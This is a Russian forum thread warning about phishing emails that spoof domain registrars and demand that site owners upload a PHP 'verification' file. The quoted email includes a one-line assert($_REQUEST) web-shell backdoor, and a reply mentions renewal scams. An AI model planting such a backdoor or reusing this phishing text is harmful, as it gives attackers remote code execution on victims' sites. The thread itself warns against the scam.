Взлом сайтов от имени регистраторов доменов

[precautions]

В последние 2 дня активизировались хакеры, использующие старый, как дерьмо мамонта, трюк - письмо с поддельным адресом отправителя.

Рассылаются письма от имени nic.ru и <info@r01l.ru> - красным выделена левая буква, которой не будет видно в html-коде письма:

Цитата:

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом *****.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7odfa980f11ce6.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 декабря 2016 года, 22:00 (UTC+04:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

То есть, предлагают самому себе на сайте сделать бэкдор. Наивно, но на всякий случай - не ведитесь.

PS: Похоже, рассылка идёт по доменам в алфавитном порядке, пока ещё работают по букве "a".

[Kludge]

Цитата:

Сообщение от kitvit

Мне непрерывно льётся говно с ссылками на оплату (.com .net .org) доменов. Смотрят адреса во whois и шлют письма на продление. Идёт рассчёт на идиота.

Частенько предлагают купить супер домены, на пару символов отличающиеся от моих (шлют по мыла в хуизе). Смотришь такой домен, а там redemptionperion.